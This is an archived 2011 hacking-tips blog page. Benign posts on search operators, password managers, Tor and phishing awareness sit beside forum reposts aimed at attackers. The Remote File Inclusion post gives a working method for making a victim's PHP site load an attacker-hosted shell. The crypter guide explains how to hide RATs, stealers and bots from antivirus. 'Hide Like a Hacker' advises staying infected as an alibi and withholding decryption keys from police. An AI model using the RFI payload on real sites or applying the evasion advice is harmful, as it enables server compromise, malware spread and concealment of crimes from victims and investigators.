Computer Tips & Tricks

Hidden Operating System

2011-06-11T16:38:00.001+05:30

If your system partition or system drive is encrypted using TrueCrypt, you need to enter your pre-boot authentication password in the TrueCrypt Boot Loader screen after you turn on or restart your computer. It may happen that you are forced by somebody to decrypt the operating system or to reveal the pre-boot authentication password. There are many situations where you cannot refuse to do so (for example, due to extortion). TrueCrypt allows you to create a hidden operating system whose existence should be impossible to prove (provided that certain guidelines are followed — see below). Thus, you will not have to decrypt or reveal the password for the hidden operating system.

TrueCrypt

Google Search Tricks and Tips

2011-05-26T23:36:00.000+05:30

A large number of people use google to search content which they like.Google is surely leading search engine so it will be good that i share with my readers on how to search more exactly and easily what they want.All i got this by experience and a bit surfing and i will try to sum up all thins here.

1.Find specific URL:
Inorder to find specific url containing something like /portals/0 or anything like call/index.php. Then we shall use a google dork like

inurl:'term to search' e-g inurl:'/portals/0' and you will get results in no time.

2.Limit searches to a particular site:
I use this one all the time, and it’s particularly handy because many site’s built-in search tools don’t return the results you’re looking for (and some sites don’t even have a search feature). If i am looking for movies songs in site songs.pk then i will try:

movie name site:songs.pk or simple i may say content type site: any.com

3.Use of OR:
Putiing capital OR in between terms will search both the terms, either that term or the other.
Like:

ipod OR mp3 player

4.Use of related:
Including related: and the URL searches for the results that are somehow related to that URL.like

related:google.com

5.Use of ~ :
Putting text a~ infront of a word searches for a word but also for its synonyms. e-g searching for cat~nutrition will give you result of nutrition and food,protein etc, so we can use:

text~function

6.Use Google as a calculator:
Google has a built-in calculator — try entering a calculation like 110 * (654/8 + 3). Yes, your computer also has a calculator, but if you spend most of your day inside a browser, typing your calculation into the browser’s search box is quicker than firing up your calculator app.

7.Get quick currency conversions:
Google can also do currency conversion, for example: 100 pounds in dollars.
(Note: there are many online sites for doing this in more authentic way.)

8.Search for specific document types:
Google can search the web for specific types of files using the “filetype:” operator. If you’re looking for PowerPoint files about hackersthirst, for example, you could try:

hackersthirst filetype:ppt

9.Search within numerical ranges using the .. operator:
Say, for example, you want to look for information about Olympic events that took place in the 1950′s, you could use this search:

Olympics 1950..1960

10.Area code lookup:
Need to know where a phone number is located? Google will let you know where it is, and show you a map of the area, too. For example type this and search:

415

11.Phone Listing:
Let’s say someone calls you on your mobile number and you don’t know how it is. If all you have is a phone number, you can look it up on Google using the phonebook feature thats so simple but the number must be in :P.
Example:

phonebook:617-555-1212 (note: the provided number does not work – you’ll have to use a real number to get any results).

12.Word Definitions:
If you need to quickly look up the definition of a word or phrase, simply use the "define:" command.

Example: define:hacking

So, guys which one is your favourite search type.

Useful Links

2011-05-25T12:31:00.002+05:30

For Online Virus Scanner...

Hosting for Pictures links are here....

Files Hosting use this Links...

For the missing .dll or .ocx files go here...

Online Encryption & Decryption

2011-05-25T12:30:00.000+05:30

For online encryption and decryption of plain text or password go to CRYPO

JavaScript / Encrypt or Decrypt source code
Hide URL Link and email address
Hash Generator
One'Pass Generator
PassPhrase Generator
Mega-PassPhrase Generator
ASCII Encode/Decode
Encrypt online message
Decrypt online message
Encrypt or Decrypt message
Multibit Encryption

Keep Your Passwords Safe

2011-05-25T12:29:00.002+05:30

What is KeePass?

Today you need to remember many passwords. You need a password for the Windows network logon, your e-mail account, your website's FTP password, online passwords (like website member account), etc. etc. etc. The list is endless. Also, you should use different passwords for each account. Because if you use only one password everywhere and someone gets this password you have a problem... A serious problem. The thief would have access to your e-mail account, website, etc. Unimaginable.

KeePass is a free open source password manager, which helps you to manage your passwords in a secure way. You can put all your passwords in one database, which is locked with one master key or a key file. So you only have to remember one single master password or select the key file to unlock the whole database. The databases are encrypted using the best and most secure encryption algorithms currently known (AES and Twofish).

Features

Strong Security
Multiple User Keys
Portable and No Installation Required
Export To TXT, HTML, XML and CSV Files
Import From Many File Formats
Easy Database Transfer
Support of Password Groups
Time Fields and Entry Attachments
Auto-Type, Global Auto-Type Hot Key and Drag&Drop
Intuitive and Secure Clipboard Handling
Searching and Sorting
Multi-Language Support
Strong Random Password Generator
Plugin Architecture
Open Source!

For more information, see the features page.

Is it really free?

Yes, KeePass is really free, and more than that: it is open source (OSI certified). You can have a look at its full source and check whether the encryption algorithms are implemented correctly.

Test Your Anti-Virus

2011-05-25T12:28:00.000+05:30

You can also test your anti virus program for its effectiveness using a simple notepad trick. Follow the steps below to know more:

Open Notepad.
Copy the code give below in the notepad file:
X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
Save it with an .exe extension like testvirus.exe

As soon as you save this file, your anti virus program will detect the file (virus) immediately and will attempt to delete it. If this happens then your Antivirus is working properly. If not, then its time to look for some other reliable program.

NOTE: The EICAR test file (#3) is a 16-bit application and cannot be run on 64-bit versions of Windows.

Make the Matrix

2011-05-25T12:27:00.000+05:30

To make this, open notepad and type the following:

@echo off
color 2
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start

Save this file as Matrix.bat

Make sure the file type is kept as ALL FILES while saving it as a .bat file.

Open the saved file and see the magic.

Winpatrol

2011-05-25T12:26:00.002+05:30

You don't have to be doing anything wrong on the Internet to become a casualty of malware. WinPatrol takes snapshot of your critical system resources and alerts you to any changes that may occur without your knowledge. WinPatrol was the pioneer in using a heuristic behavioral approach to detecting Zero-Day attacks and violations of your computing environment. WinPatrol continues to be the most powerful system monitor for its small memory footprint.

WinPatrol's easy tabbed interface allows you to explore deep inside your computer without having to be a computer expert. A one-time investment in WinPatrol PLUS provides a unique experience you won't find in any other software.

Website

The Hacker’s Underground Handbook

2011-05-25T12:25:00.000+05:30

The Hacker’s Underground Handbook starts off with the very basics with topics like programming and Linux. It then moves on to introduce and teach the topics of

* password cracking

* phishing

* network hacking

* wireless hacking

* malware

* Windows hacking

You can get it from here

Cracking The Coding Interview (4 Edition)

2011-05-25T00:17:00.004+05:30

Cracking the Coding Interview: 150 Programming Interview Questions and Solutions

CareerCup, LLC | 2010 | ISBN: 145157827X | 310 pages | PDF | 3 Mb

Product Description

Now in the 4th edition, Cracking the Coding Interview gives you the interview preparation you need to get the top software developer jobs. This book provides:

* 150 Programming Interview Questions and Solutions: From binary trees to binary search, this list of 150 questions includes the most common and most useful questions in data structures, algorithms, and knowledge based questions.

* Ten Mistakes Candidates Make -- And How to Avoid Them: Don't lose your dream job by making these common mistakes. Learn what many candidates do wrong, and how to avoid these issues.

* Steps to Prepare for Behavioral and Technical Questions: Stop meandering through an endless set of questions, while missing some of the most important preparation techniques. Follow these steps to more thoroughly prepare in less time.

* Interview War Stories: A View from the Interviewer's Side: Humorous but instructive stories from our interviewers show you how some candidates really flopped on the most important question - and how you can avoid doing the same.

Download Here

Ultimate Guide To Protect Youself

2011-05-25T00:13:00.001+05:30

Here is an in-detail thread about self-protection from all the intrusions, hack attempts, rats, keylogging, stealing etc.

The basic idea is to have a good army of ANTI's to protect yourself. You will need the following tools:-

1) Anti-Virus :- Run an Anti-Virus no matter how powerful your system is. Even free ones would do. Below is the list of free topline Anti-Virus.

2) Anti-Malware :- There are two recommendation that i would give. Both of them are free, do a great job and both run on your demand.

3) Host Intrusion Prevention System:- This is also known as HIPS. It can Prevent you from unwanted intrusions like telnet acess etc. My personal recommendation is

Win Patrol

4) Firewall:- Dont forget to run Windows Firewall. If its setup correctly it can block most unwanted intrusions. And you could also run free firewalls out there. Some of the most used ones include

5) Key Scrambler:- Use some free key scramblers to protect yourself from keylogging. And most importantly use a virtual keyboard while typing in passwords of bank logins, paypal login etc.

Some of the free ones are:-

KeyScrambler

6) Browser Selection:- Internet browsers are personal choice. No matter whatever browser you use, never save any password.

If you want to save passwords, then use the following method:-

Download Mozilla Firefox and install it.
Open Firefox ----> Tools ----> Options -----> Security Tab.
Tick "Remember password for sites" and "Use a master password".
Type in a master password.

Now each time you goto a login page where the password is saved, it will first ask for the master password, hence protecting your password from stealers.

7) Sandboxie :- Use Sandboxie if you are a heavy downloader. What sandboxie does is understood from the picture below:

8) Use VmWare to run unkown softwares. It is similar to sandboxie.

9) Never save any password on IM clients like MSN, Yahoo, Skype etc.

10) Never save passwords on ftp clients like filezilla, smart ftp etc.

11) Never download any softwares which says poker chips creator, free paypal money adder etc. Never believe in such softwares which dont exist. Its all fake softwares which are binded probably with a bot.

12) Never visit links which you are not sure.

13) Never accept pictures sent through IM clients where the sender in unkown.

14) Finally make sure all your windows, anti-virus, anti-malware definitions are upto date.

Credit: ProVirus from Crackhackforum

Hackers Terminology

2011-05-25T00:04:00.000+05:30

White Hat - These are people who write Anti Virus programs, and spend their time fighting malware. They do not get involved in the use of viruses/trojans, but instead spend their time disinfecting computers.

Black Hat - These are people with casual disregard for morals. They infect other computers, and some commit serious fraud and other crimes. These people give "Hacking" a bad name.

Grey Hat - These people are in between white and black hat.

Skid - This is someone who is not very good at hacking, and does not really know what they are talking about. They C&P programs, instead of learning how to code one themselves. If you are called this, don't bother flaming back as this will just encourage the person. Some people also use the term noob.

A Newbies Guide

2011-05-25T00:02:00.001+05:30

Q: What is hacking?

A: The terms "hack" are also used to refer to a modification of a program or device to give the user access to features that were otherwise unavailable, such as DIY circuit bending. It is from this usage that the term "hacking" is often incorrectly used to refer to more nefarious criminal uses such as identity theft, credit card fraud or other actions categorized as computer crime

Q: What is cracking?

A: Password cracking is the process of recovering passwords from data that has been stored in or transmitted by a computer system. A common approach is to repeatedly try guesses for the password. The purpose of password cracking might be to help a user recover a forgotten password (though installing an entirely new password is less of a security risk, but involves system administration privileges), to gain unauthorized access to a system, or as a preventive measure by system administrators to check for easily crackable passwords. On a file-by file basis, password cracking is utilized to gain access to digital evidence for which a judge has allowed access but the particular file's access is restricted.

Q: What is a virus/trojan/malicious script?

A: A computer virus is a computer program that can copy itself and infect a computer. The term "virus" is also commonly but erroneously used to refer to other types of malware, adware, and spyware programs that do not have the reproductive ability. A true virus can only spread from one computer to another (in some form of executable code) when its host is taken to the target computer; for instance because a user sent it over a network or the Internet, or carried it on a removable medium such as a floppy disk, CD, DVD, or USB drive. Viruses can increase their chances of spreading to other computers by infecting files on a network file system or a file system that is accessed by another computer..

Q: What is a stealer?

A: A stealer is a software designed to create viruses. This virus is called as a server. You send the server to the victim and if they open it all their passes (according to how the stealer is built) will be sent to you via email, or ftp or a php webhost.

Q: What is a RAT?

A: A Rat is a software created that created similar servers (virus). If the victim opens it they will be your RAT. You can have a complete access to their system. There are hundereds of features.

RAT - Remote Administration Tool.

Q: What is a keylogger?

A: A keylogger is a software designed to create servers. You send the server to the victim and if they open it all their keystrokes would be sent you via email, ftp, php webhost etc.

Q: What is BOT?

A: A bot is a malicious program which has several purposes.

They are usually told what to do by a botnet admin although many of the features now are automated.

Q: What is a BOTNET?

A: A botnet is a network of infected computers that all connect to one area where they are commanded by the botnet admin.

Q: What is a crypter?

A: All your servers that you create of a keylogger, stealer, RATs etc. are detected by antivirus. So inorder to make it FUD (Fully UnDetectable) we use a crypter and crypt your infected server.

Q: How does a crypter work?

A: A crypter has a built in or external file called stub. This stub is based on common encryptions like rc4, xor, tweafish, blowfish etc. When you crypt your infected file the crypter embeds the stub onto your server and covers the server. Just like how you paint your rusted metals. And makes it undetectable from anti-virus.

Q: What is reverting?

A: Reverting is a technique used to obtain forgotten passwords. But a hacker uses this method to access the victims account.

Q: What is social engineering?

A: It is a psychological approach, where you manipulate people into performing actions or divulging confidential information, rather than by breaking in or using technical hacking techniques (essentially a fancier, more technical way of lying).

Q: What is DDos?

A: DOS - Denial Of Service.

This is using bots. If you have a large number of bots you make them send packets to the target site and make them break down.

Q: How is website and forum hack possible?

A: There are lots of methods. The most basic one is you find exploits on a webserver and use them to gain access and deface it.

Sql, XSS, LFI, RFI, DNS poisoning etc.

Q: Can everyone be h4k5er?

A: No, u need a brain and common sense.

Credit: ProVirus from crackhackforum

Penetration Testing Bookmarks

2011-05-25T00:00:00.001+05:30

The Open Penetration Testing Bookmarks Collection

...is just that, a collection of handy bookmarks I initially collected that aid me in my day to day work or I find in the course of research. They are not all inclusive and some sections need to be parsed but they are all good reference materials. I find having this Hackery folder in Firefox an easy way to reference syntax, tricks, methods, and generally facilitate and organize research.

Opening it up to everyone will facilitate a knowledge transfer. Hopefully the initial set will grow and expand.

Download the Bookmark from here

Who?:

Started by Jason Haddix of HP's Application Security Center. Edited and managed by Nathan Drier of Trustwave SpiderLabs division and James Fitts of Strategic Security.

Work and contributions also by:

David Shaw of Redspin Penetration Testing @ownpile

Rob Fuller of Rapid7 @mubix

How it's working atm:

First off, we need help. OCD organizational people and people who can contribute or sort out the best links. Comment on the wiki if you wanna pitch in. Free beer at con's ;)

The whole bookmarks html file is ready for import to firefox off of the downloads section. As people submit new links we will add them and restructure the categories as they expand. Otherwise the wiki page should have all the links piecemeal should you not decide to download the whole folder (which is lame).

How to submit your bookmarks:

Since a bookmarks file is not really what you usually use a code repository for we opted just to use the download and wiki sections of google code.

If you have suggestions or a few links to submit, leave a comment on the wiki page.

Not all links submitted will be added.

If you think you have a large set of bookmarks you think can contribute email us and we might add you to the contributors section.

FAQ:

Why not use a social bookmarking site?

Well, we don’t really like them. They offer tagging but as long as we keep the list categorized well we will stick with this format… for now. Again this is the OPEN Pentest Bookmarks Collection so feel free to port it if you so desire.

Why didn’t my bookmark make the cut?

We hate to be choosy with an open source project but we wanted to keep the bookmarks very fresh and relevant. Who made us judge and jury? um… googlecode apparently. Hell, we even plan on pruning some of the initial ones we picked out (don’t worry all revisions should be documented). If your link didn’t make it, we apologize, we have only so many categories and we don’t want the collection to headsplode too fast.

Can I help with parsing/project work?

Right now we have 4 owners and 1 contributor who are contributing part time and it’s enough. We will reach out if we need some more people. Thanks for all offers =)

The general categories are:

Forums:

Created for forums that will help in both tool usage, syntax, attack techniques, and collection of scripts and tools. Needs some help. I don't really frequent too many underground forums but i actually find nice one-off scripts and info i can roll into my own code in these places. Would like to add more.

Blogs Worth It:

What the title says. There are a LOT of pentesting blogs, these are the ones i monitor constantly and value in the actual day to day testing work.

OSINT Sites:

OSINT has become a hug part of the pentest methodology. From fueling social engineering, to passively profiling your target infrastructure. There are subfolders for Presentaions on how-to, sites for profiling people and organizations, ans sites for profiling technical assets. This section is doing okay atm.

Exploits and Advisories

Places to go for exploit descriptions, white-papers, and code. Needs work.

Exploitation Intro

If you'd like to get into exploit dev, these are really the guides and docs that will start you off in the right direction. Since Exploit dev is not my primary occupation this section could always use help.

Agile Hacking

Mostly collections of guides on non-tool command line hacking syntax. Heavily inspired by Ed Skoudis and PDP of GNUCitizen. Needs work.

Cheatsheets and fu!

Random cheatsheets for heavily used tools and reference. Need a lot of work.

*nix <3

Collection of *nix command line knowledge and distributions for pentesting. Needs work.

Training/Classes

Open source classes relating to hacking and penetration testing. I would really like to find more of these.

Methodologies

Some practical and some high level methodologies for hacking related activities. Needs a lot of work.

Labs

If you want to practice your fu, these links to test sites, blogs about practice, and lab setup-how to's will help. needs work, would like to convert to direct links as well.

Tools

Semi-parsed, nor has it really been inspected for relevancy. More of just a place i dump links for new tools and tools i use often. Needs a LOT of help, parsing, additions, etc.

Web Vectors

I do a lot of web stuff. Here are some web vectors and associated useful docs and cheatsheets on each of them. Could always use more in these sections.

Misc Sec

Not categorized, misc, and randomness.

MiTM

It's not even parsed yet, nor has it really been inspected for relevancy. needs lots of work.

Hacker Media

Needs additions to main pages of con video archives. It's an okay start though. Needs work.

Setting up Tor

2011-05-24T23:26:00.000+05:30

Windows:

Go download Tor here

After downloading Tor:

Run the .exe
Extract to your PC.
You will now have extracted TOR into the selected folder. You should have a button called “Start Tor” with an onion on it, click this to start (if you want you can make a shortcut by right-clicking create shortcut and drag it to your desktop, make sure the original stays in the same folder though).
You are good to go, if your ISP blocks connections to TOR and you need help setting up a bridge.

Linux:

Download Tor here
Extract to destination of your choice
You should now be able to just click your start tor button to start.
For additional ease of use, try Tor Button for Firefox

Mac OS X:

Download Tor here:
Mount the .dmg file and find it on your desktop
Move Vidalia to your applications folder
Download the Tor button for Firefox here: https://www.torproject.org/torbutton/index.html.en
Once you have both installed, run Vidalia and make sure it says ”Connected to the Tor Network!” and then go to your Firefox browser and right click on the indicator in the bottom right and click “Toggle Tor Status”
Read more on operating Tor here

A NOTE FOR ALL OS’s:

To check anytime if TOR is working, you can go here: https://check.torproject.org/ and it will tell you if your TOR is working.
Highly reccomended is the TOR button for firefox: https://addons.mozilla.org/en-us/firefox/addon/torbutton/ which will allow you to turn tor on/off as well see if it’s disabled in your browser.

Anonymous Browsing Using Tor Button for Firefox

Start by install Tor on your computer and configuring it to your liking. Then, download the Tor Button add-on for Firefox, and use the options to configure the add-on the way you want it. Then, press the “Tor Button” and go to a test website to ensure you’ve done it correctly. If the website returns properly anonymous results, then you’ve correctly set up Firefox for anonymous browsing through Tor.

Troubleshooting: refer to www.torproject.org

Credit goes to RTZHACKER

Hackers

2011-05-24T23:19:00.000+05:30

Who is a hacker, and what does he do?

A hacker is a computer enthusiast, someone good at what he does, and all-around intrigued by technology. He'll spend all night trying to solve a particular problem, to make a patch to make a program function properly, just to do it. Not because he personally benefits from it, or he's getting paid to do so. Hackers are the ones who built many of the things we use today, and did a damned good job doing it.

What is a cracker, and what does he do?

A cracker is someone with some of the knowledge a hacker has, sometimes an equal amount. The difference between them is the Hacker builds things while the Cracker breaks(into) them. A cracker is one who searches for vulnerabilities only to exploit them, commonly without intent to even inform the admin of them. Crackers are the ones you see on the news stealing credit card numbers, all that type of thing.

Credit goes to BluexXxKalishnikov

How To Spread Bots. 600 bots in 3 days!!!!!!

2011-05-24T23:13:00.000+05:30

owning computer with adobe pdf 9.3.0 exploit :)

2011-05-23T14:59:00.000+05:30

SANS SECURITY 560 Network Penetration Testing & Ethical Hacking

2011-05-23T10:37:00.000+05:30

SANS SECURITY 560 Network Penetration Testing & Ethical Hacking | 1.5 GB

SANS Security 560 is one of the most technically rigorous courses offered by the SANS Institute. Attendees are expected to have a working knowledge of TCP/IP, cryptographic routines such as DES, AES, and MD5, and the Windows and Linux command lines before they step into class. Although SANS Security 401 (Security Essentials) and then next SANS Security 504 (Hacker Techniques, Exploits, and Incident Handling) are not pre-requisites for 560, these courses cover the groundwork that all 560 attendees are expected to know. While 560 is technically in-depth, it is important to note that programming knowledge is NOT required for the course.

Download:
http://adf.ly/1a2Sq
http://adf.ly/1a2Sr
http://adf.ly/1a2Ss
http://adf.ly/1a2St
http://adf.ly/1a2Su
http://adf.ly/1a2Sv
http://adf.ly/1a2Sw
http://adf.ly/1a2Sx
http://adf.ly/1a2Sy
http://adf.ly/1a2Sz
http://adf.ly/1a2T0
http://adf.ly/1a2T1
http://adf.ly/1a2T2
http://adf.ly/1a2T3

RFI = Remote File Inclusion

2011-05-20T18:18:00.000+05:30

Basically RFI is a method of getting your cleverly coded PHP shell onto a server. First off we will take a look at the code that allows us to use this vulnerability.

<?php
$page = $_GET['page'];
include($page);
?>

This code can be arranged several different ways, but it comes down to not limiting user input. To eliminate this problem, use a switch statement to make sure they can only choose the ones given.

But, since you cannot view the PHP to a webpage, we are going to have to detect it some other way. To do this, the targets URL must look something like this;

http://www.slave.com/index.php?page=main.php

The "?page" can be replace with any sort of variable really. If the site URL looks like this, they might be vulnerable to RFI.

Try manipulating the page variable to be something else such as;

http://slave.com/index.php?page=http://www.yoursite.com/yourshell.txt

You can replace the "http://www.yoursite.com/yourshell.txt" with a shell of your choice. If it doesn't work, there is a way you can possibly fix it.
The code might look something like this;

<?php
$file =$_GET['page'];
include($file .".php");
?>

This makes whatever is inputted to be treated as a PHP file. If this happens, your shell will not execute. For any shell to work, it must be in ".txt" form.
To eliminate this nuisance, we modify our URL manipulation slightly to look like this;

http://slave.com/index.php?page=http://www.yoursite.com/yourshell.txt?

The "?" at the end, makes it so that the shell does not get all fucked up by the ".txt.php" crap at the end, and your final URL will look like this;

http://slave.com/index.php?page=http://www.yoursite.com/yourshell.txt?.php

Which makes it so that the ".php" does not screw up your shell
=========================================================

Credits: Vlatko from Hackforums

Recovering Google Account Password Using Google Password Decryptor

2011-05-17T12:30:00.001+05:30

Description: This video is on GooglePasswordDecryptor

It shows how to use GooglePasswordDecryptor to instantly recover the Google Password from popular web browsers & messengers using both GUI & Command-Line interface.

This video is created by Preetam - one of the main contributor & forum moderator on SecurityXploded.com

How to protect yourself against phishing

2011-05-17T01:25:00.000+05:30

1. What is phishing?

Phishing is the method of stealing login info(usernames and passwords) by directing the slave to a clone(fake) login page, that logs the login info without the knowledge of the slave.
Such clone website is known as a phisher.

2. How to protect yourself against phishing?

Use your login info in the correct places only - Don't ever put your login info anywhere else than the page you registered to, unless it's a trusted service you know(such as youtube or blogger asking for your google account's info).

Make sure the website you're logging in isn't fake - Whenever you login to a website, if you didn't type the URL(address) of the website yourself, i.e. if you clicked a link that led you to the login page(from message, website, search engine results), always check the url(address) to see if you're in the right place. For instance, if you're logging in your facebook account, make sure the url appears as http://www.facebook.com/... Where a phisher page would look like http://www.facebook.freewebs.com/... or http://www.facebook.spam.com/... or any url whose part before the .com isn't exactly the same as the page you want to login to.

Make sure the links you're clicking aren't fake - Whenever you're clicking a link, check where the link goes before clicking it. Links can be masked to appear as something else than the page they're leading to. For example, www.google.com leads to yahoo instead of google. Fortunately, in most browsers, whenever you point your mouse cursor over the link, the true location of the link is displayed on the bottom left part of the screen. Try it with the above link. This is particularly important because it can protect you from another, rarer but more dangerous method called cookie stealing, which is basically automatically stealing your account if you're previously logged in the website.

Know that links to phishing pages are usually spread via email, and often represent impersonating trusted services and persons, such as making the email appear as it's sent from the website you've registered to, or a friend of yours whose account has been compromised.

3. What to do if you have spotted a phisher?

Report the phisher as soon as you can.
Report the phisher's address here: http://www.google.com/safebrowsing/report_phish/
If the phishing attempt has been done via message, report the message in any of the following services:
http://www.reportphish.org/forwardphish.php
http://www.reportphish.org/forwardphish.php
http://www.us-cert.gov/nav/report_phishing.html
If you received the message from a friend's compromised account, inform your friend, and other friends that might be in danger.
If possible, inform the admin of the website/forum that the phisher is made for.

Credit: Crow from Hackforums

Backtrack 5

2011-05-16T11:12:00.000+05:30

Hide Like a Hacker

2011-05-16T02:41:00.000+05:30

i- Protection

ii- Encryption

iii- Anonymity

iv- Links

Protection

Basically what I am trying to say in this section is, before you go out hacking other people and other things, just check for a second and make sure it's not as easy to hack your device. There are some pretty simple steps for this though.

Make sure all your security updates are installed, if you have windows firewall disable it.

Download your own firewall. If you are behind a router you can skip this.

Make sure all unused ports are closed.

Check your msconfig, run a few HJT logs and Malwarebyte's to make sure you are not already infected.

Use a keyscambler to prevent keyloggers

It is important that you are not infected because other could see you hacking and steal it from you or alternitively, if they get caught, you get caught. On the other hand you might want to stay infected by a bot or RAT so if and when you are caught you can claim you had know knowledge and the bot controlled your PC and performed the hackl without your knowledge. However I am not someone who intends to be caught. (I'm not really a black hat either)

I don't personally use an AV for many reasons reasons:

It is possible to make an FUD virus, this is likely to be what you get infected with.

It often goes around deleting your stuff without asking.

They slow down your PC and often hog the CPU.

Whilst performing updates it slows down your connection.

FireWall:

KeyScrambler:

HJT:

Malewarebytes:

Another way to prvent this is to use a Lixux-based O/S as altohugh these aren't 100% secure they have a lot on Windows machines due to the fact they are less common.

But remember you are not invisible:

Encryption

Be under no ilussions, this is one of the most important steps to keeping information secret. Now I am a big fan of encryption and here is why:

"if your encryption program uses 128-bit keys, your particular key could be any of more than 3.4 trillion billion billion billion possible combinations. More likely to win the lottery than to crack that level of encryption using the brute-force method"Or just use RSA 4096-bit and 256-bit AES

Now I think this says a little bit about how much safer encryption makes you, if you encrypt your HDD using 256-bit, there is little chance even the authorities will crack it.... in your lifetime. However do be aware of local law for example in the UK the new Regulation of Investigatory Powers Act states:

Individuals who are believed to have the cryptographic keys necessary for such decryption will face up to 5 years in prison for failing to comply with police or military orders to hand over either the cryptographic keys, or the data in a decrypted form.

The penelties are up to 5 years for terrorism-related inforamtion and 2 years for "All other failures to comply"

Therefore depending on the strength of your offence it could be more wise to with-hold your key on claims of a privacy breach, and face the maximum two years than to hand over your keys.

The program I most recomend for doing this is

TrueCrypt:

Download

True crypt can provdie 256-bit encryption

The design and strength of all key lengths of the AES algorithm (i.e., 128, 192 and 256) are sufficient to protect classified information up to the SECRET level. TOP SECRET information will require use of either the 192 or 256 key lengths.

Oh and that's not even the most useful part:

TrueCrypt allows you to create a hidden operating system whose existence will be impossible to prove (provided that certain guidelines are followed — see below). Thus, you will not have to decrypt or reveal the password for the hidden operating system.

As there is a pre-boot authentication process which asks for your encryption password you can have two, one for people to see and one for hacking purposes. This is IMPOSSIBLE to prove so I highly recommed using it, although I don't use it myself...

Anonymity

Now, this is THE MOST IMPORTANT section of the whole tutorial, get this part right and you can pretty much forget about the rest (however if you are performing something illegal following the other steps might help you sleep better.

Hidding your IP and identity is crucial. Here is my prefred methods:

SOCKS5 Proxy

L1 HTTPS Proxy

GCI proxy

Encrypted VPN (no logs)

Diference between SOCKS and HTTP

SOCKS
Bill wishes to communicate with Jane over the internet, but a firewall exists on his network between them and Bill is not authorized to communicate through it himself. Therefore, he connects to the SOCKS proxy on his network and sends to it information about the connection he wishes to make to Jane. The SOCKS proxy opens a connection through the firewall and facilitates the communication between Bill and Jane. For more information on the technical specifics of the SOCKS protocol, see the sections below.

HTTP
Bill wishes to download a web page from Jane, who runs a web server. Bill cannot directly connect to Jane's server, as a firewall has been put in place on his network. In order to communicate with the server, Bill connects to his network's HTTP proxy. His internet browser communicates with the proxy in exactly the same way it would the target server—it sends a standard HTTP request header. The HTTP proxy reads the request and looks for the Host header. It then connects to the server specified in the header and transmits any data the server replies with back to Bill.

Remember:

HTTP proxies are traditionally more HTTP protocol aware and do more high level filtering (even though that usually only applies to GET and POST methods, not CONNECT). SOCKS proxies can also forward UDP traffic and work in reverse - HTTP proxies can't do that.

Due to the restrictions of a HTTP proxy, they ONLY work for HTTP traffic and do not support UDP and other types of proxy uses. the reason is because they "infer the address of the server and therefore may only be used for HTTP traffic".

Use both HTTP and SOCKS if possible though this is known as "Proxy Chaining" this is used to make your actions harder to trace but its not truely effective.

REMEBER: Do not use an L3 HTTP proxy as they show your true IP in the header and are therefore essentially pointless.

VPN

This is by far the most effective way to conceal your identity. It channels you traffic and encrpts it with 128-bit. Although some support 256-bit. Often a VPN is much more reliable and does not slow down your connection as much (in fact I haven't noticed mine at all)

A VPN is a virtual Private Network

"Secure VPNs use cryptographic tunneling protocols to provide confidentiality by blocking intercepts and packet sniffing, allow sender authentication to block identity spoofing, and provide message integrity by preventing message alteration."

ProxyFirewall is a good program which runs SOCKS and HTTP proxies

Download

Bibliography:

UK law report:

http://arstechnica.com/tech-policy/news/...l-time.ars

Regulation of Investigatory Powers Act:

http://www.opsi.gov.uk/acts/acts2000/ukpga_20023_en_8

Goverment stance on AES:

http://csrc.nist.gov/groups/STM/cmvp/doc...SS15FS.pdf

Wikipedia review on AES:

http://en.wikipedia.org/wiki/Advanced_En...d#Security

TrueCrypt Hidden o/s:

Link

SOCKS Information and example:

http://en.wikipedia.org/wiki/SOCKS

Proxy Chaining:

Link

Linux infection news:

http://www.zdnet.com/blog/bott/linux-inf...dated/2206

Official IRCd announcement:

http://forums.unrealircd.com/viewtopic.php?t=6562

Credits: crackhackforum

Beginners Guide to Crypters

2011-05-10T12:54:00.001+05:30

* What is a crypter?
* What constitute a crypter?
* Are all crypters same?Confused
* How many types of crypters are there?
* FUD/UD, What the hell is that?
* Stub?Omg What is it use?
* Will my Crypter remain FUD forever?
* How to make sure my crypter remain FUD for the longest time?

Crypters
Oh well, the shiny little toys every members on HF wants to play with, you register to HF and see countless threads on "Selling crypters cheap" or "Please crypt my file I will pay or +rep"(ah.. the good ol' days)

A Crypter is free software used to hide our viruses, RATs or any keylogger from anti-viruses so that they are not detected and deleted by anti-viruses. Thus, a crypter is a program that allow users to crypt the source code of their program. Generally, antivirus work by splitting source code of application and then search for certain string within source code.

Crypters may be coded in different launguages but there functionality remain almost the same i.e to crypt your detectable servers so they become FUD.

FUD
FUD means Fully Undetectable and UD means Undetectable.

A FUD crypter is theoretically/practically not detected by any AV at the time of it being scanned on Virus Scanners.

With increased use of Crypters to bypass anti-viruses, AV became more advanced and started including crypter definitions to even detect crypter strings within code. So, use of crypter to hide Rats(PI, Bifrost), Stealers and Bots became more complicated as nowadays, no publicly available crypter is FUD.

So, if you crypt RAT, Bot servers with publicly available crypters, they are bound to be detected by antiviruses. This is because most FUD crypters remain "FUD" for maximum of one or two days after their public release.Then they become UD.

So, if you want a FUD or close to FUD crypter, I suggest Buying one or learn to make public crypters FUD or Semi-FUD(The crypter which is detected by 2-3 AV's).

Parts of a Crypter
A Crypter has 2 parts:

* Client
* Stub

A) The client is the interface where we may upload our file and use the options it brings, according to the programmer that made the crypter and crypt our files.

B) The stub is an executable file(.exe) or a. Dll some times. This file is used as a filter for files that are uploaded to the client crypter.

Functioning :
Once the client is open, it loads its stub ... goes through the file, and accordingly the file gets crypted as the stub.

Here is how executable crypters work:

1) The actual processor commands of a protected binary are crypted/obscured/munged whatever

2) When the protected application first starts, a small decrypter stub is first run that restores all of the original processor commands for the executable in memory.

3) Finally, the decrypter stub ends and transfers execution to the original entry point (OEP) and the program runs normally. So, basically the crypter's that have in-built stubs gets detected very fast, the others take some time to get detected.

Also you can modify the stub once it gets detected by changing the entry and exit points.

Types of Crypter

* External Stub
* Internal Stub
* Runtime
* Scantime

External Stub : Well most of you have downloaded a public crypter by now and when you open the folder you have seen 2 things:

Client.exe and Stub.exe

These type of crypters are called External Crypter in which the functionality of the crypter pretty much depends on the external stub.
You delete the stub and the crypter is useless.

Internal Stub : The crypters that contain only Client.exe fall under this category. In this the stub is coded within the crypter.

There are ways to detach the stub from the crypter, but in some other tutorial.

Runtime Crypters : The crypters that crypts a server that remains Undetectable upon running in the memory of a PC is called a runtime crypter.
